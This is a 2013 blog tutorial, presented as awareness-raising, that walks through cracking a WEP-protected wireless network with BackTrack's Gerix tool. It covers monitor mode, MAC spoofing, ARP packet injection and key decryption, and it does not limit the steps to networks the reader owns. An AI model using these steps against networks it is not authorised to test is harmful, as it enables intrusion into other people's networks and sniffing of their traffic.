Thursday, July 11, 2013

Cracking WEP wireless network


     Online encryption is important but most people I’ve come across never give a second thought about it. They don’t think that a hacker will hack them because they are just ordinary people. But we regular folks are the ones they are after! They use minions to achieve their wicked goals because they are disposable. This post will be a 3 part series that demonstrates how to infiltrate a wireless network with WEP encryption, sniff the network traffic, and then use the data collected to impersonate a user. The goal is to raise awareness on how vulnerable wireless connections are.

     There are hundreds of articles online that will teach you how to crack a wireless network. Now there is another one.

1) Download Backtrack ISO and burn it to CD and then boot from the disc.
       You don’t need to install the program but you can
       I will be using the BT5R3-GNOME-32 for this demonstration
2) Once it is installed or booted up, login and start the GUI
       Default user name is root and the password is toor
       Type startx to start the GUI
3) The tool we will use is Gerix
       Navigate to: Applications, BackTrack, Exploitations Tools, WLAN Exploitation, gerix-wifi-cracker-ng


4) Click the configuration tab and highlight your wireless adapter (wlan0) listed under interface
       If there is no adapter present, refer to the notes at the end of this article
5) Click enable/disable monitor mode to create a new interface (mon0)
       Highlight mon0 and set a random mac address


6) Scroll down and click rescan networks
       After the wireless network appears, select one from the list with WEP encryption and decent signal strength


7) Navigate to the WEP tab and start sniffing
       A box will appear, just move it aside, don’t close it
          The number below #Data is what we are monitoring
          The more traffic on the network the more we get, but we can inject stuff to make traffic


If no one is on the network then you will need to simulate traffic, click test injection to see if the AP is vulnerable.

8) Try a Chopchop attack first, Crate an ARP packet to be injected the Inject the create ARP packet
       Another window will pop up and ask you if want to inject with the created packet, type Y and hit enter
       This will help you get more #Data (try fragmentation injection if it doesn’t work)


9) Once you have at least 5000, try and crack
       Click on the Cracking tab and click on Decrypt WEP password


     Another Window will pop up and will display the password when successful


If you don’t have enough #Data it will not be successful, wait to get more and click Decrypt WEP again when you have more (10,000 or 15,000)


     Gerix is just a GUI for the aircrack-ng, for full functionality, your wireless adapter chipset will need to support injection. The list of supported chipsets can be found here the page has not been modified since 2011, so there are probably more chipsets on the market that is supported.


No comments:

Post a Comment